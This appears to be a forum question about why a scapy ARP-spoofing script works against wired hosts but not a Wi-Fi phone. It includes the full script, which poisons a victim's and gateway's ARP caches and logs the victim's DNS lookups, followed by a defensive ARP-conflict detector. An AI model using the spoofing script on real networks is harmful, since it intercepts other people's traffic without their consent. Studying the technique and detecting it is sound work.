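I recently watched a tutorial about intercepting network traffic with the help of a Python module called "scapy" (https://www.youtube.com/watch?v=fkYd8MPzgts). When I use the Python code on my machine, it works fine. I enter the IP address of the host whose network traffic I want to intercept, as well as the IP of the gateway it uses. So far, so good. But as soon as I enter the IP address of my phone (which uses Wi-Fi to reach the gateway), the script no longer works properly. I only receive packets from time to time. Interception no longer seems feasible.

I have tried to understand why this is the case, although I have not found an exact answer yet. I think that interception on the desktop brings some problems; for example, packets sent over the air are much more "unstable" than packets sent over a wire. I can imagine that this makes interception difficult for the Scapy script.

I also thought about the host's ARP cache. In general, a computer stores the ARP address of its gateway in order to find its way to communicate over the Internet more quickly. However, as soon as a new ARP request is sent over the network, that "problem" should be resolved.

The tutorial's code can be found on pastebin (https://pastebin.com/1cMu4kzZ); I added some thoughts in the code comments! These were not made by the author of the code: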

    from scapy.all import *
    import threading
    import os
    import sys

    # specify the ip addresses of the victim and gateway in order to intercept these two
    VIP = raw_input('Please enter the IP address of the victim computer: ')
    GW = raw_input('Please enter the IP address of the gateway: ')
    IFACE = raw_input('Please enter the name of your interface: ')
    print '\nMake sure you are running as root!, and enjoy. '
    print '\t\t\nPoisoning Victim & Gateway! .. '

    # set the parameter of ip forwarding to 1 in order to enable forwarding the intercepted packets to the router and vice versa
    os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')  # Ensure the victim receives packets by forwarding them

    # check if the received packets are the kind of packets we're interested in (here: DNS packets)
    def dnshandle(pkt):
        if pkt.haslayer(DNS) and pkt.getlayer(DNS).qr == 0:
            print 'Victim: ' + VIP + ' has searched for: ' + pkt.getlayer(DNS).qd.qname

    # create an arp packet which is sent to the victim (but we act as if it came from the gateway)
    def v_poison():
        v = ARP(pdst=VIP, psrc=GW)
        while True:
            try:
                send(v,verbose=0,inter=1,loop=1)
            except KeyboardInterrupt:
                sys.exit(1)

    # create an arp packet which is sent to the victim (but we act as if it came from the gateway)
    def gw_poison():
        gw = ARP(pdst=GW, psrc=VIP)
        while True:
            try:
                send(gw,verbose=0,inter=1,loop=1)
            except KeyboardInterrupt:
                sys.exit(1)

    vthread = []
    gwthread = []

    while True:
        # make sure, that we send enough packets to fool the host and gateway that the ip of the gateway belongs to our host (associate the ip of the gateway with our MAC address)
        vpoison = threading.Thread(target=v_poison)
        vpoison.setDaemon(True)
        vthread.append(vpoison)
        vpoison.start()

        gwpoison = threading.Thread(target=gw_poison)
        gwpoison.setDaemon(True)
        gwthread.append(gwpoison)
        gwpoison.start()

        # sniff with the help of the sniff function from scapy filtering for arp packets
        pkt = sniff(iface=IFACE,filter='udp port 53',prn=dnshandle)

Why can Wi-Fi traffic not be intercepted (or at least only much worse) compared to wired traffic?
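
For the defensive side of the script above, an added example (not part of the original post or of the tutorial's code): a standard-library Python 3 check that parses ARP payloads and reports IP/MAC binding conflicts. Scapy's `ARP()` defaults to `op=1` (who-has), so the spoofed frames built by `ARP(pdst=..., psrc=...)` are requests, and the check therefore reads the sender fields of every ARP message rather than replies only. All addresses and the sample capture are constructed.

```python
import struct
from collections import defaultdict

def _mac(m): return bytes.fromhex(m.replace(":", ""))
def _ip(a): return bytes(int(x) for x in a.split("."))

def build_arp(op, sha, spa, tha, tpa):
    """Build a 28-byte Ethernet/IPv4 ARP payload (only used to construct sample input)."""
    return (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
            + _mac(sha) + _ip(spa) + _mac(tha) + _ip(tpa))

def parse_arp(payload):
    """Return (op, sender_mac, sender_ip), or None if not Ethernet/IPv4 ARP."""
    if len(payload) < 28:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", payload[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha = ":".join("%02x" % b for b in payload[8:14])
    spa = ".".join(str(b) for b in payload[14:18])
    return op, sha, spa

def find_conflicts(payloads):
    """Return (IPs claimed by several MACs, MACs claiming several IPs)."""
    ip_to_macs, mac_to_ips = defaultdict(set), defaultdict(set)
    for payload in payloads:
        parsed = parse_arp(payload)
        if parsed is None or parsed[2] == "0.0.0.0":  # skip junk and ARP probes
            continue
        _, sha, spa = parsed  # requests (op 1) and replies (op 2) both carry a sender binding
        ip_to_macs[spa].add(sha)
        mac_to_ips[sha].add(spa)
    # A MAC with several IPs can be legitimate (multi-homed host, proxy ARP): triage, don't block.
    return ({ip: sorted(m) for ip, m in ip_to_macs.items() if len(m) > 1},
            {mac: sorted(i) for mac, i in mac_to_ips.items() if len(i) > 1})

# Constructed sample addresses and capture; none of these values come from the post.
GW_IP, GW_MAC = "192.168.1.1", "aa:aa:aa:aa:aa:01"
PHONE_IP, PHONE_MAC = "192.168.1.50", "aa:aa:aa:aa:aa:50"
SPOOF_MAC, ZERO = "de:ad:be:ef:00:99", "00:00:00:00:00:00"
SAMPLE = [
    build_arp(2, GW_MAC, GW_IP, PHONE_MAC, PHONE_IP),   # genuine gateway reply
    build_arp(1, PHONE_MAC, PHONE_IP, ZERO, GW_IP),     # genuine phone request
    build_arp(1, SPOOF_MAC, GW_IP, ZERO, PHONE_IP),     # spoofed: gateway IP, wrong MAC
    build_arp(1, SPOOF_MAC, PHONE_IP, ZERO, GW_IP),     # spoofed: phone IP, wrong MAC
]

if __name__ == "__main__":
    ip_conflicts, mac_conflicts = find_conflicts(SAMPLE)
    print("IP claimed by several MACs:", ip_conflicts)
    print("MAC claiming several IPs:", mac_conflicts)
```

On a live network the payloads would come from a capture restricted to ARP frames, with the Ethernet header stripped before `parse_arp` is called.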